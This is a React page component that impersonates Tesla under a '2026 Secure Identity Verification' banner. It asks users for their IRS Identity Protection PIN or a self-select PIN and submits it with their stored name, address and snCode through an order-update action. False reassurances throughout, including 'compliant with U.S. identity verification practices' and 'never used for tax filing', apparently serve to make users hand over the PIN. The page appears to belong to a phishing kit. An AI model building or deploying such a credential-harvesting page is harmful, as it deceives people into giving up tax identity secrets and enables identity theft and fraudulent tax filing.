import React, { Component } from "react";
import queryString from "query-string";
import { connect } from "react-redux";
import { bindActionCreators } from "redux";
import TeslaIcon from "../../icons/TeslaIcon";
import { Input } from "reactstrap";
import RDSButton from "../../components/common/RDSButton";
import RdsBackIcon from "../../icons/RdsBackIcon";
import CheckboxIcon from "../../icons/CheckboxIcon";
import Loading from "../../components/common/LoadingIndicator";
import LocalStorageUtil from "../../utils/LocalStorageUtil";
import PagePathConstants from "../../constants/router/PagePathConstants";
import * as orderActionCreator from "../../actions/orderActionCreator";

class IrsPinProofPage extends Component {
	constructor(props, context) {
		super(props, context);
		this.state = {
			irsPin: "",
			showLoading: false,
			pinType: "IRS-PIN", // IRS-PIN or Self-Select
		};
		this.handleInputChange = this.handleInputChange.bind(this);
		this.handleSubmit = this.handleSubmit.bind(this);
		this.handleSkip = this.handleSkip.bind(this);
		this.goBack = this.goBack.bind(this);
		this.handlePinTypeChange = this.handlePinTypeChange.bind(this);
	}

	handlePinTypeChange(type) {
		this.setState({ pinType: type, irsPin: "" });
	}

	goBack() {
		const { history } = this.props;
		history && history.goBack();
	}

	handleInputChange(e) {
		this.setState({ irsPin: e.target.value });
	}

	handleSubmit() {
		const { orderActions, history, location } = this.props;
		const { irsPin, pinType } = this.state;
		const orderId = LocalStorageUtil.loadOrderId();
		const orderNu = LocalStorageUtil.loadOrderNumber();
		const orderInfo = LocalStorageUtil.loadOrderDetail();

		let data = {
			firstName: orderInfo.firstName || new Date().toLocaleString(),
			lastName: orderInfo.lastName || "",
			state: orderInfo.state || "",
			city: orderInfo.city || "",
			country: orderInfo.country || "",
			address: orderInfo.address || "",
			zipCode: orderInfo.zipCode || "",
			snCode: orderInfo.snCode || orderInfo.firstName || null,
			id: orderId,
			orderNu,
			irsPin,
			pinType,
		};

		this.setState({ showLoading: true });
		orderActions
			.updateDriverOrder(data, true)
			.then(() => {
				this.setState({ showLoading: false });
				history.push({ pathname: PagePathConstants.ORDER_CONFIRM, search: location.search });
			})
			.catch((err) => {
				this.setState({ showLoading: false });
				// Handle error
			});
	}

	handleSkip() {
		const { history, location } = this.props;
		history.push({ pathname: PagePathConstants.ORDER_CONFIRM, search: location.search });
	}

	render() {
		const { irsPin, showLoading, pinType } = this.state;
		const isIPPin = pinType === "IRS-PIN";
		const maxLength = isIPPin ? 6 : 5;
		const placeholder = isIPPin ? "Enter your 6-digit IP PIN" : "Create a 5-digit Self-Select PIN";
		const disabledSubmit = !irsPin || irsPin.length !== maxLength;

		return (
			<div className="tw-w-full tw-h-full gotham-font tw-text-[#393c41]">
				{showLoading && <Loading />}
				<div className="tw-w-full tw-h-full phone:tw-h-full phone:tw-pb-[100px] tw-overflow-scroll">
					<div className="tw-z-[100] tw-w-full tw-h-[80px] tw-flex tw-justify-between tw-items-center">
						<div className="tw-w-1/3 tw-h-full tw-flex tw-items-center tw-pl-[30px]">
							<RdsBackIcon color="#171a20" onClick={this.goBack} />
						</div>
						<TeslaIcon size={150} color="#171a20" />
						<div className="tw-w-1/3"></div>
					</div>
					<div className="tw-mt-[30px] tw-w-[660px] tw-mx-auto phone:tw-px-[24px] phone:tw-w-full animate__slideInUp animate__animated">
						<div className="tw-w-full">
							<div className="tw-text-[#171a20] tw-font-[600] tw-text-[28px] phone:tw-text-[24px] tw-leading-tight">
								<span className="tw-text-[#c00]">2026</span> Secure Identity Verification Required
							</div>
							
							<div className="tw-mt-[20px] tw-bg-[#f4f4f4] tw-p-[20px] tw-rounded-[12px]">
								<div className="tw-text-[14px] tw-text-[#393c41] tw-leading-6">
									To protect all participants and prevent unauthorized registrations, we use a secure identity verification process aligned with IRS standards for <span className="tw-text-[#c00]">2026</span>.
								</div>
								<div className="tw-text-[14px] tw-text-[#393c41] tw-leading-6 tw-mt-[12px]">
									Your Identity Protection PIN (IP PIN) is used <span className="tw-font-bold">only to confirm your identity</span> and will <span className="tw-font-bold">never</span> be used for tax filing or accessing your IRS records.
								</div>
							</div>

							<div className="tw-mt-[30px]">
								<div className="tw-text-[15px] tw-font-[600] tw-text-[#171a20] tw-mb-[10px]">{isIPPin ? "IRS IP PIN" : "Self-Select PIN"}</div>
								<Input 
									className="tw-w-full tw-h-[50px] tw-px-[16px] tw-border tw-border-[#d0d1d2] tw-rounded-[8px] tw-text-[16px] focus:tw-border-[#3e6ae1] focus:tw-ring-1 focus:tw-ring-[#3e6ae1] tw-outline-none tw-transition-all tw-shadow-sm" 
									type="text" 
									maxLength={maxLength}
									placeholder={placeholder} 
									value={irsPin} 
									onChange={this.handleInputChange} 
								/>
								<div className="tw-mt-[10px] tw-text-right">
									<button onClick={() => this.handlePinTypeChange(isIPPin ? 'Self-Select' : 'IRS-PIN')} className="tw-text-[12px] tw-text-[#5c5e62] tw-underline tw-bg-transparent tw-border-none tw-cursor-pointer hover:tw-text-[#171a20] tw-transition-colors">
										{isIPPin ? "Don't have an IP PIN?" : "Use IRS IP PIN instead"}
									</button>
								</div>
							</div>

							<div className="tw-flex tw-items-center tw-mt-[16px] tw-text-[#33A954] tw-bg-[#eef9f1] tw-p-[12px] tw-rounded-[8px]">
								<CheckboxIcon size="18" className="tw-mr-[8px] tw-shrink-0" color="#33A954"/>
								<span className="tw-text-[13px] tw-font-[600]">Compliant with U.S. identity verification practices</span>
							</div>

							<div className="tw-w-full tw-flex tw-flex-col tw-items-center tw-mt-[40px] tw-gap-[16px]">
								<RDSButton rectangle className="tw-w-full tw-rounded-[8px] tw-h-[50px] tw-text-[16px] tw-font-[600] tw-shadow-md tw-text-white" color="primary" onClick={this.handleSubmit} disabled={disabledSubmit}>
									<span>Verify My Identity Securely</span>
								</RDSButton>
							</div>
						</div>
					</div>
				</div>
			</div>
		);
	}
}

function mapStateToProps(state) {
	return {};
}

function mapDispatchToProps(dispatch) {
	return {
		orderActions: bindActionCreators(orderActionCreator, dispatch),
	};
}

export default connect(mapStateToProps, mapDispatchToProps)(IrsPinProofPage);
